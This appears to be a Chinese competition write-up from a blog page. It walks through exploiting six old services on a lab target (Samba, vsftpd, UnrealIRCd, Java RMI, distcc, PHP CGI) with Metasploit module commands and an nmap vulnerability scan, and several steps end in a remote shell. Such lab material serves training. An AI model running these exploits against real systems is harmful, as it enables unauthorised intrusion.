网络空间安全大赛

2021年星光国赛题

混战靶机漏洞利用

一、Samba MS-RPC Shell命令注入漏洞(445)

Samba 中负责在 SAM 数据库更新用户口令的代码未经过滤便将用户输入传输给了

/bin/sh。

如果在调用 smb.conf 中定义的外部脚本时,通过对 /bin/sh 的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以 nobody 用户的权限执行任意命令。

1. 在kali 中执行msfconsole,启动 metasploit

2. use exploit/multi/samba/usermap_script选择漏洞

3. set RHOST 192.168.56.102 设置要攻击的机器IP

4. run,开始攻击

5. 利用成功,执行uname -a验证

二、Vsftpd 源码包后门漏洞(21)

在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

1.在kali 中执行msfconsole,启动metasploit

2.use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行uname -a验证

三、UnreallRCd 后门漏洞(6667)

在2009年11月到2010年6月间分布于某些镜面站点的 UnreallRCd,在 DEBUG3DOLOG_SYSTEM 宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

1.在kali中执行msfconsole,启动metasploit

2.use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

3.set RHOST 192.168.56.102设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行uname -a验证

四、Java RMI SERVER 命令执行漏洞(1099)

Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

1.在kali中执行msfconsole,启动metasploit

2.use exploit/multi/misc/java_rmi_server,选择漏洞

3.set RHOST 192.168.56.102设置要攻击的机器IP

4.run,开始攻击

5.利用成功,得到 meterpreter shell

五、Distcc 后门漏洞(3632)

  1. nmap --script=vuln -p 3632 192.168.84.128

Distcc 用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是 xcode1.5 版本及其他版本的 distcc2.x 版本配置对于服务器端口的访问不限制。

1.在kali 中执行msfconsole,启动metasploit

2.msf>use exploit/unix/misc/distcc_exec选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行id查看权限,uname -a验证服务器信息

六、PHP CGI 参数注入执行漏洞

GI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

漏洞影响版本 php < 5.3.12 or php < 5.4.2

1.在kali中执行msfconsole,启动metasploit

2.msf>use exploit/multi/http/php_cgi_arg_injection 选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器lP

4.run,开始攻击

5.meterpreter> Is 获得 meterpreter

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值